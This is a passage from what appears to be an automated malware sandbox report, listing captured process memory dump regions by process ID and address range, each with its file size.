                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-51-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-50-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-44-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-42-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-43-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-48-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4636-49-0x000002642F5C0000-0x000002642F5C1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                              • memory/4712-100-0x0000000000790000-0x000000000089E000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                              • memory/4712-101-0x0000000005100000-0x000000000519C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                              • memory/4712-111-0x0000000005340000-0x000000000536E000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                                              • memory/5600-22104-0x0000000000400000-0x0000000000A6D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                              • memory/5600-317-0x0000000000400000-0x0000000000A6D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                              • memory/5600-1047-0x0000000000400000-0x0000000000A6D000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                              • memory/5804-22268-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/5804-22290-0x0000000072B20000-0x0000000072C2A000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                              • memory/5804-22291-0x0000000072A90000-0x0000000072B18000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                544KB

                                                                                                                                                                                                                                              • memory/5804-22272-0x0000000074D30000-0x0000000074D79000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                292KB

                                                                                                                                                                                                                                              • memory/5804-22284-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/5804-22286-0x0000000072D00000-0x0000000072DC8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                800KB

                                                                                                                                                                                                                                              • memory/5804-22287-0x0000000072C30000-0x0000000072CFE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                824KB

                                                                                                                                                                                                                                              • memory/5804-22269-0x0000000072DD0000-0x000000007309F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.8MB

                                                                                                                                                                                                                                              • memory/5804-22271-0x0000000072C30000-0x0000000072CFE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                824KB

                                                                                                                                                                                                                                              • memory/5804-22270-0x0000000072D00000-0x0000000072DC8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                800KB

                                                                                                                                                                                                                                              • memory/5804-22275-0x0000000072A90000-0x0000000072B18000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                544KB

                                                                                                                                                                                                                                              • memory/5804-22274-0x0000000072B20000-0x0000000072C2A000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                              • memory/5804-22273-0x0000000074D00000-0x0000000074D24000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/5804-22285-0x0000000072DD0000-0x000000007309F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.8MB

                                                                                                                                                                                                                                              • memory/5804-22288-0x0000000074D30000-0x0000000074D79000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                292KB

                                                                                                                                                                                                                                              • memory/5804-22289-0x0000000074D00000-0x0000000074D24000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/5960-430-0x0000000000400000-0x000000000040F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/5960-435-0x0000000000400000-0x000000000040F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/5960-431-0x0000000000400000-0x000000000040F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/6856-20448-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/6856-18279-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/6856-18308-0x0000000072BE0000-0x0000000072C29000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                292KB

                                                                                                                                                                                                                                              • memory/6856-18310-0x0000000072AA0000-0x0000000072BAA000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                              • memory/6856-18311-0x0000000072A10000-0x0000000072A98000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                544KB

                                                                                                                                                                                                                                              • memory/6856-18306-0x0000000072D00000-0x0000000072DC8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                800KB

                                                                                                                                                                                                                                              • memory/6856-18309-0x0000000072BB0000-0x0000000072BD4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/6856-18307-0x0000000072C30000-0x0000000072CFE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                824KB

                                                                                                                                                                                                                                              • memory/6856-18296-0x0000000072DD0000-0x000000007309F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.8MB

                                                                                                                                                                                                                                              • memory/6856-22257-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/7376-26907-0x0000000074C70000-0x0000000074CA9000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                228KB

                                                                                                                                                                                                                                              • memory/7376-19368-0x0000000072830000-0x0000000072869000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                228KB

                                                                                                                                                                                                                                              • memory/7376-17652-0x0000000074C70000-0x0000000074CA9000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                228KB

                                                                                                                                                                                                                                              • memory/7412-10178-0x00000000017C0000-0x00000000017CC000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                              • memory/7660-25277-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/7660-25309-0x0000000072B20000-0x0000000072C2A000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                              • memory/7660-25307-0x0000000074D00000-0x0000000074D24000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                              • memory/7660-25306-0x0000000074D30000-0x0000000074D79000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                292KB

                                                                                                                                                                                                                                              • memory/7660-25305-0x0000000072C30000-0x0000000072CFE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                824KB

                                                                                                                                                                                                                                              • memory/7660-25304-0x0000000072D00000-0x0000000072DC8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                800KB

                                                                                                                                                                                                                                              • memory/7660-25303-0x0000000072DD0000-0x000000007309F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.8MB

                                                                                                                                                                                                                                              • memory/7660-28210-0x0000000072DD0000-0x000000007309F000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.8MB

                                                                                                                                                                                                                                              • memory/7660-25341-0x0000000072A90000-0x0000000072B18000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                544KB

                                                                                                                                                                                                                                              • memory/7660-28211-0x0000000072D00000-0x0000000072DC8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                800KB

                                                                                                                                                                                                                                              • memory/7660-28205-0x00000000004B0000-0x00000000008B4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4.0MB

                                                                                                                                                                                                                                              • memory/7660-28212-0x0000000072C30000-0x0000000072CFE000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                824KB

                                                                                                                                                                                                                                              • memory/7696-12278-0x0000000006810000-0x0000000006876000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                                              • memory/7696-11535-0x0000000005580000-0x00000000055D6000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                344KB

                                                                                                                                                                                                                                              • memory/7696-11498-0x0000000000400000-0x0000000000538000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.2MB